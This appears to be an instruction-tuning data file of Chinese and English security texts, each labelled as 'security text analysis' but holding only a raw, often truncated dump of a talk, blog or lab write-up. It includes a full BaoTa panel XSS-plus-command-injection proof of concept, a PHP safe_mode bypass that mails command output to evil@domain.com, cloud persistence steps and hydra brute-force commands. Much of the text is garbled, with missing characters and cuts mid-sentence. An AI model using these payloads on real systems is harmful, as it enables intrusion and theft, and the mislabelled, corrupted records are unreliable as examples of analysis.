{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n准备工作 找到网站名 JS payload 复现过程 此时的 wwwroot 目录下面是没有文件的 发包 User-Agent: </tExtArEa>\"><script src=http://URL/1.js></script> 点击网站日志 成功 RCE 原理分析 这里我用的环境是 7.9.1 版 目前的官网最新版也是 7.9.1 版本 复现流程可以看出来是 xss+后台 RCE 的组合拳 首先是 xss我们可以看到日志可以成功用</textarea>闭合然后就是经典的 script src 分析源码看看宝塔是如何读取日志的 这里有一个 getsitelogs 函数其中获取了网站的日志路径然后传进了 GetNumLines 函数 跟进去如下 函数里面语句较多但是并没有任何的过滤 然后 returnMsg 直接 return 回来 其中日志是由 nginx 保存的宝塔读取日志数据并 return 回来无任何过滤加上拼接即 可造成 xss 那么如何扩大危害造成 rce 呢宝塔其中有一个 getlines 函数如下 注意一个函数ExecShell其中使用了 subprocess.Popen 执行了命令这也是 Py 自带的执 行命令函数我们可以看到全程也是无过滤的 那么我们转回来看 getline 函数 先判断了传来的 filename 存不存在不存在就 return如果存在的话就往下进行拼接 num 和 filename所以我们就知道了怎么可以 rce传一个必定存在的 filename然后 num 执行 命令就可以了但因为这是在后台所以需要 xss+csrf 配合触发 全部 poc //JQuery preload (optional) (function(){ var s = document.createElement('script');s.type = 'text/javascript';s.async = true;s.src = 'https://code.jquery.com/jquery-2.1.4.min.js'; (document.getElementsByTagName('head')[0]||document.getElementsByTagN ame('body')[0]).appendChild(s); })(); // cookie let cookies = document.cookie; function getCookie(sKey) { if (!sKey) { return null; } return decodeURIComponent(document.cookie.replace(new RegExp(\"(?:(?:|.*;)\\\\s*\" + encodeURIComponent(sKey).replace(/[\\- \\.\\+\\*]/g, \"\\\\$&\") + \"\\\\s*\\\\=\\\\s*([;]*).*$)|.*$\"), \"$1\")) || null; } all_headers = { \"Accept\":\"*/*\", \"X-Requested-With\":\"XMLHttpRequest\", \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36\", \"Connection\":\"close\", \"Accept-Encoding\":\"gzip, deflate\", \"dnt\":\"1\", \"sec-gpc\":\"1\", \"Cookie\": cookies, \"x-cookie-token\": getCookie('request_token'), \"Accept-Language\":\"zh-CN,zh;q=0.9,en;q=0.8\", \"x-http-token\": $('#request_token_head').attr('token'), \"Content-Type\":\"application/x-www-form-urlencoded; charset=UTF-8\" } $.ajax({ url: \"/ajax\", type: \"get\", data: {\"action\":\"get_lines\",\"filename\":\"/etc\",\"num\":\"|echo 'BT RCE test ZAC'> /www/wwwroot/1.txt|\"} , headers: all_headers, success: function (data) { console.info(data); } }); ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJohn E. Benson, J.D. Bridging the Gap Between Technology and the Law  Fundamental differences  Perceptions and adoption  Trial Issues  Julie Amero  Torrentspy A Look Ahead  jur1st  Attorney  Professor  See me afterwards for more details Introduction Technology v. The Law  Becomes more advanced  Changes day to day  Thrives on growth and development Technology  Rare sweeping changes  Slow to react  Hates all that is new and different The Law  Through the Common Law system laws are  Stable  Predictable  Methodical Why Cant the Law be Different?  Unpredictable viewpoint  Cases have yet to reach appellate levels  Cases havent been brought at all Cause and Effect Adoption and Perception of Technology  Most attorneys dont have a deep understanding of technology  Judges are even worse  Attorneys come from diverse backgrounds Who are We Talking About?  Most students used laptops  Most use Windows XP  Most use Internet Explorer  Most dont pay attention to sending their passwords in the clear Recent Graduates  Attorneys love email and Blackberries  All Federal Courts have electronic filing  Attorneys have a strong obligation to keep communications secret Adoption  CONFIDENTIALITY NOTICE: This e-mail message including attachments, if any, is intended for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any unauthorized review, use, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply e-mail and destroy all copies of the original message. Thank you.  Easy to use  Easy to implement  Especially for a small practice Encryption  Ok, John. Nice to know you have encrypted your message to our little \"Family\"  BTW: Like we need to worry that \"Homeland Security\" will now be watching because you posted to this little \"House\"? Understanding  Operate on the front lines  Require excellent advocacy skills  Working understanding of facts Trial Attorneys  Substitute teacher  Risk o", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nwhoami  Tamas Szakaly (sghctoma)  from Hungary, the land of Pipacs , Palinka and gulash :)  pentester/developer @  OSCE  part of team Prauditors, European champion of Global Cyberlympics 2012 whatami   I am not a computer nerd. I prefer to be called a hacker!  a binary guy  love crackmes and toying with protections  whatami   I am not a computer nerd. I prefer to be called a hacker!  a binary guy  love crackmes and toying with protections  prepare for big coming out: whatami   I am not a computer nerd. I prefer to be called a hacker!  a binary guy  love crackmes and toying with protections  prepare for big coming out: Ive been in love with the Win32 API for years :) game modding  the urge to make things better  implement your own ideas  custom content: maps, models, etc. to create game modding  the urge to make things better  implement your own ideas  custom content: maps, models, etc.  share with others  http://www.moddb.com/  http://www.gamemodding.net/  even get paid for them  Steam Workshop to create to share nobody plays alone  data exchange between client and server  complex data structures  often obscure protocols nobody plays alone  data exchange between client and server  complex data structures  often obscure protocols  fuzzing heaven!!!  Game Engines: A 0-days Tale by ReVuln scripting in games  built-in scripting engines  custom-made or embedded language  ARMA scripts  Lua-scripted video games @Wikipedia - 153 titles  Squirrel (Valve games)  purpose: dynamic maps, AI, etc.  available to modders could scripts be really dangerous?  downloaded from the server, or with custom maps  runs on the gamers machine  dangerous functionality (e.g. file I/O)  poorly implemented sandboxes  easy to exploit: no need to circumvent exploit mitigations surely Im not the first one  surely Im not the first one   so, why do this talk?  game exploits are used to cheat  so, why do this talk?  game exploits are used to cheat  but they can give access to your pc  so, why do this ta", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: EC2 下的权限维持 --- <center><h1>EC2 下的权限维持</h1></center> --- ## 1用户数据 在上文描述到用户数据的时候可以很容易发现用户数据可以被用来做权限维持只需要将要执行的命令改成反弹 Shell 的命令即可 但是也许目标可能很长时间都不会重启实例而且用户数据也只有实例停止时才能修改因此还是传统的权限维持方式会更具有优势些这样来看使用用户数据进行权限维持显得就有些鸡肋了 ## 2后门镜像 当攻击者获取到控制台权限后可以看看目标的 AMIAmazon 系统镜像如果可以对其进行修改或者删除创建的话RT 就可以将原来的镜像替换成存在后门的镜像 这样当下次目标用户在选用该镜像创建实例的时候就会触发我们在镜像中植入的恶意代码了 ## 3创建访问密钥 如果当前环境可以创建新的访问密钥则可以在 IAM 中创建访问密钥进行权限维持 ## 4创建辅助账号 除了以上的权限维持方法还可以通过在 IAM 中创建高权限子账号的方式进行权限维持然后通过这个子账号进行后续的持续攻击行为 ## 5其他的权限维持方法 除了上述方法外还可以通过在实例中添加隐藏用户安装远控软件等等传统方法进行权限维持 > 参考资料 > > https://cloud.tencent.com/developer/article/1931560 <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = \"2022年4月15日\" } } </script>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n近場狩獵 Hunting in the Near Field Android平台上NFC相關漏洞的研究 An Investigation of NFC-related bugs of Android 360阿爾法實驗室 趙奇 Qi Zhao from 360 Alpha Team 360 ALPHA 關於講者 About the Speaker  @JHyrathon  360阿爾法實驗室 安全研究員 Security Researcher of 360 Alpha Team  專注於Android組件安全NFC多媒體IPC通訊Binder 均有涉獵 Focuses on the security of components of Android system, including NFC, TrustZone, Binder, and Multimedia  目前正在研究高通TrustZone Currently working on Qualcomm TrustZone 關於團隊 About the Team  360阿爾法團隊 360 Alpha Team  總計近200項Android相關漏洞被確認包括GoogleQualcomm等 廠商 approximately 200 Android Vulnerabilities (Google, Qualcomm, )  Android漏洞獎勵計劃史上最高額獎金得主 Won the highest reward in ASR history  多項Pwn Contest冠軍 Many pwn contests winner  Pwn2Own 2016(Chrome)  Pwn2Own Mobile 2017(Galaxy S8)   發現的漏洞 Hunted Bugs ID Type Sub Component CVE-2019-2017 EoP t2t CVE-2019-2034 EoP i93 CVE-2019-2099 EoP nfa CVE-2019-9358 EoP t3t hce CVE-2019-2135 ID mifare A-124321899 ID t4t A-124466497 EoP nfc hci A-125447044 ID mifare A-124466510 EoP nfc hci A-124792090 EoP jni A-126126165 EoP mifare A-128469619 EoP hal ID Type Sub Component A-120101855 DoS t3t A-122047365 ID i93 A-122447367 ID t4t hce A-122629744 ID t3t A-124334702 ID t4t A-124334707 ID t4t A-124579544 EoP i93    確認的漏洞 Comfirmed 重複的漏洞 Duplicated NFC協定疊 NFC Stack Overview NFC協定疊 NFC Stack Overview 過度臃腫不同廠商的協定堆積在一起從RFID時代起的很多歷史問題 Overstuffed, varied implementations, legacy (from RFID)  漏洞獵人的機會 Opportunity for bug hunters NFC協定疊 NFC Stack Overview 模組命名方式非常隨意不同的廠商組織實現中同樣的協定可能有多種稱呼 Many names are arbitrary Different organizations/vendors/implementations use what they like NFC在Android中的實行方式 NFC of Android Mode Uses Protocols Reader/Writer Raw Tag reader/writer, NDEF reader/writer type 1-4 tag, ISO-15693 tag, Mifare tag Host-based Card Emulation Metro card emulation, offline payment t3t(FeliCa), t4t P2P Android Beam LLCP Android NFC結構 Android NFC structure Java Wrapping JNI implementation Mifare Stack NDEF processing impl. card emulatio n impl. P2P impl.(LL CP) t1t t2t t4t i93 R", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n一Web Web Web Web 服务器安全 PHP 其实不过是 Web 服务器的一个模块功能所以首先要保证 Web 服务器的安全当然 Web 服务器要安全又必须是先保证系统安全这样就扯远了 无穷无尽PHP 可以和各种 Web 服务器结合这里也只讨论 Apache非常建议以 chroot 方式安装启动 Apache这样即 使 Apache 和 PHP 及其脚本出现漏洞受影响的也只有这个禁锢的系统不会危害实际系 统但是使用 chroot 的 Apache 后给应用也会带来一定的麻烦比如连接 mysql 时必须用 127.0.0.1地址使用 tcp 连接而不能用 localhost 实现 socket 连接这在效率上会稍微差一点 还有 mail 函数发 送邮件也是个问题因为 php.ini 里的 [mail function] ; For Win32 only. SMTP = localhost ; For Win32 only. sendmail_from = me@localhost.com 都是针对 Win32平台所以需要在 chroot 环境下调整好 sendmail 二PHP PHP PHP PHP 本身问题 1远程溢出 PHP-4.1.2以下的所有版本都存在文件上传远程缓冲区溢出漏洞而且攻击程序已经广泛流 传成功率非常高 http://packetstormsecurity.org/0204-exploits/7350fun http://hsj.shadowpenguin.org/misc/php3018_exp.txt 2远程拒绝服务 PHP-4.2.0和 PHP-4.2.1存在 PHP multipart/form-data POST 请求处理远程漏洞虽然不能获得 本地用户权限但是也能造成拒绝服务 3safe_mode 绕过漏洞 还有 PHP-4.2.2以下到 PHP-4.0.5版本都存在 PHP mail 函数绕过 safe_mode 限制执行命令漏 洞4.0.5版本开始 mail 函数增加了第五个参数由于设计者考虑不周可以突破 safe_mode 的 限制执行命令其中4.0.5版本突破非常简单只需用分号隔开后面加 shell 命令就可以了 比如存在 PHP 脚本 evil.php <? mail(\"foo@bar,\"foo\",\"bar\",\"\",$bar); ?> 执行如下的 URL http://foo.com/evil.php?bar=;/usr/bin/id|mail evil@domain.com 这将 id 执行的结果发送给 evil@domain.com 对于4.0.6至4.2.2的 PHP 突破 safe_mode 限制其实是利用了 sendmail 的-C 参数所以系统必 须是使用 sendmail如下的代码能够突破 safe_mode 限制执行命令 <? # 注意下面这两个必须是不存在的或者它们的属主和本脚本的属主是一样 $script=\"/tmp/script123\"; $cf=\"/tmp/cf123\"; $fd = fopen($cf, \"w\"); fwrite($fd, \"OQ/tmp Sparse=0 R$*\" . chr(9) . \"$#local $@ $1 $: $1 Mlocal, P=/bin/sh, A=sh $script\"); fclose($fd); $fd = fopen($script, \"w\"); fwrite($fd, \"rm -f $script $cf; \"); fwrite($fd, $cmd); fclose($fd); mail(\"nobody\", \"\", \"\", \"\", \"-C$cf\"); ?> 还是使用以上有问题版本 PHP 的用户一定要及时升级到最新版本这样才能消除基本的安 全问题 三PHP PHP PHP PHP 本身的安全配置 PHP 的配置非常灵活可以通过 php.ini, httpd.conf, .htaccess 文件该目录必须设置了 AllowOverride All 或 Options进行设置还可以在脚本程序里使用 ini_set()及其他的特定的 函数进行设置通过 phpinfo()和 get_cfg_var()函数可以得到配置选项的各个值 如果配置选项是唯一 PHP_INI_SYSTEM 属性的必须通过 php.ini 和 httpd.conf 来修改它 们修改的是 PHP 的 Master 值但修改之后必须重启 apache 才能生效其中 php.ini 设置的 选项是对 Web 服务器所有脚本生效httpd.conf 里设置的选项是对该定义 的目录下所有脚 本生效 如果还有其他的 PHP_INI_USER, PHP_INI", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1518-001-win-利用wmic发现安全软件 ## 来自ATT&CK的描述 攻击者可能会尝试获取安装在系统或云环境中的安全软件配置防御工具和传感器的列表这可能包括诸如防火墙规则和防病毒之类的内容攻击者可以在自动发现过程中使用来自安全软件发现的信息来塑造后续行为包括攻击者是否完全感染目标和/或尝试执行特定操作 可用于获得安全软件的信息例如命令的netshreg querydir与CMD和任务列表但发现行为其他指标可以是更具体的软件或安全系统的攻击者正在寻找的类型看到macOS恶意软件对LittleSnitch和KnockKnock软件执行检查已变得越来越普遍 ## 测试案例 枚举出目标系统安装的反病毒产品信息包括安装位置和版本 ```wmic wmic /namespace:\\\\root\\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe ``` ## 检测日志 windows 安全日志 ## 测试复现 ```dos C:\\Users\\Administrator>wmic /namespace:\\\\root\\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe 错误: 描述 = 找不到 ``` ## 测试留痕 ```xml <Event xmlns=\"http://schemas.microsoft.com/win/2004/08/events/event\"> <System> <Provider Name=\"Microsoft-Windows-Security-Auditing\" Guid=\"{54849625-5478-4994-A5BA-3E3B0328C30D}\" /> <EventID>4688</EventID> <Version>2</Version> <Level>0</Level> <Task>13312</Task> <Opcode>0</Opcode> <Keywords>0x8020000000000000</Keywords> <TimeCreated SystemTime=\"2021-08-08T12:11:06.644030100Z\" /> <EventRecordID>249140</EventRecordID> <Correlation /> <Execution ProcessID=\"4\" ThreadID=\"212\" /> <Channel>Security</Channel> <Computer>WIN-1CIA2BP8VBJ.qax.com</Computer> <Security /> </System> <EventData> <Data Name=\"SubjectUserSid\">S-1-5-21-1180088053-4000917822-266516913-500</Data> <Data Name=\"SubjectUserName\">Administrator</Data> <Data Name=\"SubjectDomainName\">QAX</Data> <Data Name=\"SubjectLogonId\">0x187cd2</Data> <Data Name=\"NewProcessId\">0x1384</Data> <Data Name=\"NewProcessName\">C:\\Windows\\System32\\wbem\\WMIC.exe</Data> <Data Name=\"TokenElevationType\">%%1936</Data> <Data Name=\"ProcessId\">0x151c</Data> <Data Name=\"CommandLine\">wmic /namespace:\\\\root\\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe</Data> <Data Name=\"TargetUserSid\">S-1-0-0</Data> <Data Name=\"TargetUserName\">-</Data> <Data Name=\"TargetDomainName\">-</Data> <Data Name=\"TargetLogonId\">0x0</Data> <Data Name=\"ParentProcessName\">C:\\Windows\\System32", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n解析bootloader安全 程君 throber3@gmail.com 自我介绍  10年安全研究与开发  系统安全移动与嵌入式安全  2008-2010 comodo 主动防御研究与开发  2010- 2011 网秦移动安全高级研究员  2011- 至今 猎豹移动研发经理参与手机 毒霸研发 移动安全支付  社会工程 短信诈骗 电话诈骗  盗号 程序伪冒 钓鱼 键盘记录 网络截获  系统漏洞 Root 提权 内存读取  bootloader级别漏洞 议程  bootloader 基本介绍  bootloader 获取与分析  bootloader 具体流程  bootloader attack vector 以及漏洞介绍  bootloader 安全总结 bootloader 基本介绍  什么是bootloader Bootloader 是启动加载的意思在pc时代windows 系统开 机时会首先加载bios然后是MBR,再到os loader系统内核最后启动 完毕bootloader就相当于MBR 和os loader它在手机启动的时候初 始化硬件然后引导系统内核直到系统启动常见的有pc 的grub 和嵌入式的uboot bootloader 基本介绍  研究bootloader 的意义 1.修复变砖机器 2.寻找漏洞越狱(iphone)与解锁 (android) iphone: bootrom 漏洞 key 提取 android1.永久root 2.安装第三方rom 3.安全移动操作系统设计knox bootloader 基本介绍  研究对象 由于bootloader 涉及到芯片厂商和系统不同厂商和不同系 统的启动流程均不相同高通芯片和android市场占有率最高本议 题如果没有指明特定的芯片和平台均以android 下的高通平台作为 例子说明iphone只简要介绍其bootloader流程 bootloader 基本介绍  bootloader 组成 (android) 1.PBL:prime bootladeriphone 叫 bootrom 2.SBL(1/2/3):secord bootloader 3.APPSBLHTC 的叫hboot,有的叫aboot 4.HLOS 基带也叫basehand或者radio 5.TZTrustZone bootloader 基本介绍  bootloader 组成 (iphone ) 1.BootRom: PBL, SecureROM 2.LLBLow Level Bootloader, checks the signature of iBoot 3 iBoot:stage 2 bootloader ,recovery mode 4.iBBSA stripped down version of iBoot 5.iBECperforming a restore from Fake DFU in LLB. bootloader获取与分析  Bootloader 获取 1.从rom 中获取 android后缀为mbn或者img 2. 从系统中dump a.有些android 手机 可以dump bootloader的挂载文件 bootloader获取与分析  bootloader 获取 例如华为P1 dd if=/dev/block/mmcblk0p3 of=/sdcard/mnt/bootloader.img b.iphone 下 Limera1n Exploit dump Bootrom 3. 硬件使用jtag 接口获取 android 手机一般可以通过jtag 接口获取 bootloader获取与分析  bootloader 分析以android sbl1为例 直接把sbl1 拖到ida 中反汇编效果不明显 我们缺少了什么加载地址怎么样确定加 载地址 1.bootloader cpu体系手册规定的加载地 址 2.bootloader 文件格式结构 3.手动分析经验猜测 bootloader获取与分析  bootloader 分析 以android sbl1为例 1.bootloader cpu体系手册规定加载地址 现在手机操作系统一般使用高通的芯片 比较多我们以MSM8960为例 见下图  sbl1 0x2A000000 tz: 0x2a020000 sbL2 0x2E000000 sbl3:0x47f00000 bootloader获取与分析  加载地址 来自8960 Boot Architecture bootloader获取与分析  bootloader 获得与分析 以android 为例 2.bootloader 文件结构中规定的加载地址 bootloader获取与分析 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Black Art of Wireless Post-Exploitation: Bypassing Port-Based Access Controls Using Indirect Wireless Pivots DEF CON Gabriel solstice Ryan net user author /domain Gabriel Ryan Security Engineer @ Gotham Digital Science Appsec | Infrastructure Testing | Red Team | Research @s0lst1c3 gryan@gdssecurity.com labs@gdssecurity.com New in this presentation: Hostile Portal Attacks:  Steal Active Directory creds from WPA2-EAP networks without network access Indirect Wireless Pivots:  Use Rogue AP attacks to bypass port-based access control mechanisms WPA2-EAP Wireless Theory: Evil Twin Attacks Rogue access point attacks:  Bread and butter of modern wireless penetration tests  Stealthy MITM attacks  Steal RADIUS credentials  Captive portals Evolution of Rogue Access Point Attacks 2002 - Evil Twin attacks documented in Wireless LAN Security FAQ - C. W. Klaus [1] 2003  asleap - Joshua Wright [2] 2004 - Karma Attacks - Dino Dai Zovi and Shane Macaulay [3] 2008 - Freeradius-wpe - Joshua Wright and Brad Antoniewitz [4] 2014 - Improved Karma Attacks (Mana) - Dominic White and Ian de Villiers [5] 2017  Lure10 Attacks  George Chatzisofroniou [30] Evolution of Rogue Access Point Attacks Rogue AP attacks primarily used to fill two roles: 1. MITM attacks (stealing creds) 2. Breaching WPA/WPA2 networks (gaining access to WLAN) In this talk: rogue AP attacks as a means of lateral movement. Evil Twin Attacks Against WPA2-EAP WPA2-EAP Logically:  Authentication occurs between supplicant and authentication server [6][7][8] Wireless Theory: EAP Without secure tunnel, auth process can be sniffed:  Attacker sniffs challenge and response then derives password offline  Legacy implementations of EAP susceptible to this (i.e. EAP-MD5 eapmd5hash by Joshua Wright in 2008 [13]) The attack:  freeradius-wpe by Brad Antoniewicz in 2008 [4]  Force supplicant to authenticate with attacker using evil twin attack [4] Cracking MS-CHAPv2 Dictionary Attack:  success rate inversely proportional to strength of", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJVM字节码学习笔记class 件结构 0x01 前 本系列学习笔记均来深理解 JVM 字节码作者张亚本笔记仅于个学习知 识总结 对于学习 java 安全想了解 JVM 字节码的童鞋们强烈建议购买正版书去阅读 0x02 class 件结构 java 是跨平台的门语但是 jvm 却不是跨平台的但是不同平台的 JVM 帮我们屏蔽了差 异通过 JVM 可以把源代码编译成和平台关的字节码这样我们的源代码就不根据不同 平台编译成不同进制是可执件了这也是 java 字节码的意义所在 class 件由部分组成具体如下 魔数magic number 版本号minor&major version 常量池constant pool 访问标记access flag 类索引this class 超类索引super class 接表索引interface 字段表field 法表method 属性表attribute 句顺溜可以帮助我们记忆 My Very Cute Animal Truns Savage In full Moon Areas. 我可爱的宠物会在圆时变得暴躁 1魔数magic number 魔数主要于利件内容本来标识件的类型class 件的魔数为 0xcafebabe 虚拟 机在加载类件之前会先检验这 4 个字节如果不是那么会抛出 java.lang.ClassFormatError 异常 java 之 James Gosling 曾经写过篇章意是他之前常去的家饭店有个乐队经 常演出后来乐队的主唱不幸去世他们就将那个地称为cafedead当时 Gosling 正 在设计些件的编码格式需要两个魔数个于对象持久化个于 class  件这两个魔数有着相同的前缀cafe他选择了 cafedead 作为对象持久化件的魔 数选择了 cafebabe 作为 class 件的魔数 2版本号minor&major version 魔数之后的四个字节分别表副版本号Minor Version和主版本号Major Version 如 CA FE BA BE 00 00 00 34 那么主版本号为 0x34=4x1+3x16=52 3常量池constant pool 常量池是类件中最复杂的数据结构 对于 JVM 来说如果操作数是常的数值如 0那么就会把这些操作数内嵌到字节码 中如果是字符串常量或者较的整数时class 件会把这些操作数存储在常量池中当 要使这些操作数的时候会根据常量池的索引位置来查找 数据结构意如下 常量池分为两个部分是常量池cp_info_count意思常量池项cp_info集合 常量池cp_info_count 常量池由两个字节表如果常量池为 n那么常量池真正有效的索引是 1~n-10 属于保留索引供特殊情况使 常量池项cp_info 常量池项最多包含 n-1个元素因为 long 和 double 类型的常量会占两个字节也就是说或 两个索引位置因此如果常量池中包含了这两种类型的变量那么实际中的常量池的元素个 数会 n-1要少 常量池项cp_info的数据结构意如下 每个常量池项的第个字节表常量项的类型tag接下来的个字节才表常量项的具 体内容 在 java 虚拟机中共定义了 14 种常量项 tag 类型这些常量名都以 CONSTANT开头以 info 结尾 struct{ u2 constant_pool_count; cp_info constant_poll[constant_pool_count-1]; } cp_info{ u1 tag; u2 info[]; } 常量类型 值 描述 CONSTANT_Utf8_info 1 utf-8 编码的字符串 CONSTANT_Integer_info 3 表 int 类型常量booleanbyteshortchart CONSTANT_Float_info 4 表 float 类型量 CONSTANT_Long_info 5 长整型字量 CONSTANT_Double_info 6 双精度型字量 CONSTANT_Class_info 7 表类或接 CONSTANT_String_info 8 java.lang.String 类型的常量对象 CONSTANT_Fieldref_info 9 字段信息表 CONSTANT_Methodref_info 10 法 CONSTANT_InterfaceMethodref_info 11 接法 CONSTANT_NameAndType_info 12 名称和类型表 CONSTANT_MethodHandle_info 15 法句柄表 CONSTANT_MethodType_info 16 法类型表 CONSTANT_InvokeDynamic_inf", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# SUNSET MIDNIGHT > https://download.vulnhub.com/sunset/midnight.7z 靶场IP`192.168.2.4 ` 扫描对外端口 ``` (rootkali)-[~/Desktop] # nmap -p1-65535 -sV 192.168.2.4 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-04 07:13 EDT Nmap scan report for 192.168.2.4 Host is up (0.000080s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) 3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1 MAC Address: 08:00:27:05:08:38 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.24 seconds ``` 浏览器访问80端口发现配置本地hosts ![image-20220904191517941](../../.gitbook/assets/image-20220904191517941.png) ``` (rootkali)-[~/Desktop] # cat /etc/hosts 192.168.2.4 sunset-midnight ``` ![image-20220904191627991](../../.gitbook/assets/image-20220904191627991.png) 对wordpress进行暴力破解发现无法爆破 ``` hydra -L users.txt -P /usr/share/wordlists/rockyou.txt sunset-midnight -V http-form-post '/wp-login.php:log=USER&pwd=PASS&wp-submit=Log In&testcookie=1:S=Location' -t 64 ``` 于是爆破MySQL端口找到账号密码`root/robert` ``` (rootkali)-[/tmp] # hydra -l root -P /usr/share/wordlists/rockyou.txt sunset-midnight mysql Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-04 08:43:20 [INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections) [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task [DATA] attacking mysql://sunset-midnight:3306/ [3306][mysql] host: sunset-midnight login: root password: robert 1 of 1 target succes", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n/0 232 4,294,967,296 2128 340,282,366,920,938,463,463,374,607,431,768,211,456 /1 231 2,147,483,648 2127 170,141,183,460,469,231,731,687,303,715,884,105,728 /2 230 1,073,741,824 2126 85,070,591,730,234,615,865,843,651,857,942,052,864 /3 229 536,870,912 2125 42,535,295,865,117,307,932,921,825,928,971,026,432 /4 228 268,435,456 2124 21,267,647,932,558,653,966,460,912,964,485,513,216 /5 227 134,217,728 2123 10,633,823,966,279,326,983,230,456,482,242,756,608 /6 226 67,108,864 2122 5,316,911,983,139,663,491,615,228,241,121,378,304 /7 225 33,554,432 2121 2,658,455,991,569,831,745,807,614,120,560,689,152 /8 A 16,777,216 224 16,777,216 2120 1,329,227,995,784,915,872,903,807,060,280,344,576 /9 223 8,388,608 2119 664,613,997,892,457,936,451,903,530,140,172,288 /10 222 4,194,304 2118 332,306,998,946,228,968,225,951,765,070,086,144 /11 221 2,097,152 2117 166,153,499,473,114,484,112,975,882,535,043,072 /12 220 1,048,576 2116 83,076,749,736,557,242,056,487,941,267,521,536 /13 219 524,288 2115 41,538,374,868,278,621,028,243,970,633,760,768 /14 218 262,144 2114 20,769,187,434,139,310,514,121,985,316,880,384 /15 217 131,072 2113 10,384,593,717,069,655,257,060,992,658,440,192 /16 B 65,536 216 65,536 2112 5,192,296,858,534,827,628,530,496,329,220,096 /17 215 32,768 2111 2,596,148,429,267,413,814,265,248,164,610,048 /18 214 16,384 2110 1,298,074,214,633,706,907,132,624,082,305,024 /19 213 8,192 2109 649,037,107,316,853,453,566,312,041,152,512 /20 212 4,096 2108 324,518,553,658,426,726,783,156,020,576,256 /21 211 2,048 2107 162,259,276,829,213,363,391,578,010,288,128 /22 210 1,024 2106 81,129,638,414,606,681,695,789,005,144,064 /23 29 512 2105 40,564,819,207,303,340,847,894,502,572,032 /24 C 256 28 256 2104 20,282,409,603,651,670,423,947,251,286,016 /25 27 128 2103 10,141,204,801,825,835,211,973,625,643,008 /26 26 64 2102 5,070,602,400,912,917,605,986,812,821,504 /27 25 32 2101 2,535,301,200,456,458,802,993,406,410,752 /28 24 16 2100 1,267,650,600,228,229,401,496,703,205,376 /29 23 8 299", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n漏洞记深X服还没完通达OA搞RCE漏洞OA V11.6 Agan ' 338 收藏 1 原计划 分类专栏 Web常漏洞篇免费 章标签 通达OA RCE 2020-08-19 02:47:07 版权 当你的才华 还撑不起你的野时 那你就应该静下来学习 录 0x01 通达OA V11.6 源码下载与安装 0x02 前 0x03 复现漏洞 EXP 脚本 0x04 通达OA V11.5和V11.7 版本法复现该漏洞过程 本次漏洞复现只测试了三个版本 通达 OA V11.7 (最新) 通达 OA V11.6 通达 OA V11.5 订阅博主 关注 点赞 3 评论 2 分享 收藏 1 机看 打赏 修复建议升级最新版本 PS该漏洞影响很如果被成功利后会删除OA所需要的php件来绕过验证 会对站造成影响建议渗透测试业务时千万要让客户做系统备份或数据备份很 容易出事... ... 请勿作犯罪使络不是法外之地请珍惜命勿触犯法律... ... 你任何的动作别都知晓外有天外有天且且珍惜... ... 0x01 通达OA V11.6 源码下载与安装 通达OA V11.6 下载地址http://www.kxdw.com/soft/23114.html 步骤1运安装包傻式安装 订阅博主 关注 点赞 3 评论 2 分享 收藏 1 机看 打赏 步骤2运安装包傻式安装 订阅博主 关注 点赞 3 评论 2 分享 收藏 1 机看 打赏 步骤3运安装包傻式安装 订阅博主 关注 点赞 3 评论 2 分享 收藏 1 机看 打赏 步骤4成功安装 0x02 前 账号为admin 密码为空 订阅博主 关注 点赞 3 评论 2 分享 收藏 1 机看 打赏 先登录看看密码为空直接登录样式是这样的 订阅博主 关注 点赞 3 评论 2 分享 收藏 1 机看 打赏 0x03 复现漏洞 EXP 脚本 EXP直接打直接写到站根录下件名为_agan.php菜链接密码为agan 1 import requests 2 3 target=\"http://192.168.159.137:8080/\" 